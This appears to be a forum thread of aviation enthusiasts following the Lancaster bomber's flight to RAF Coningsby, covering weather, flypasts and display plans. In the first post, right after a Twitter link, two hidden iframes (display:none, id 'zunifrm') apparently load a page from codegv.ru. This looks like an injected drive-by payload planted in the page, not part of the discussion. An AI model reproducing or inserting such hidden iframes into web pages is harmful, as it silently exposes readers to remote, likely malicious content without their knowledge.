English IT gent wins auction for Lancaster Bomber flight ...

Twittering all the way, with lots of photos - https://twitter.com/MaffMunson<iframe src="about<strong></strong>://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Ps it's here, flying over Scotland at the moment, heading south to meet up with the BBMF and the Red Arrows.

She's just landed at RAF Coningsby in some pretty awful weather. The flypast with BBMF was cancelled because of it. Down to 1300 ft for the last 150 miles or so, and then went straight in. Great airmanship, and congratulations to the crew.

Dennis.

Despite stormy weather, she safely arrived at RAF Coningsby...
The debut displays, (4 days), will be over my hometown here in sunny Eastbourne... :biggrin-new:

I'll be there on Sunday 17th Stuart. Coming on an specially organised coach trip.

Such a shame, I won't be there for the flying display on Sunday.
All other days, but then off to Belgium. I will be back for the party in the evening though...

edit: Some great on board pics here on twitter:
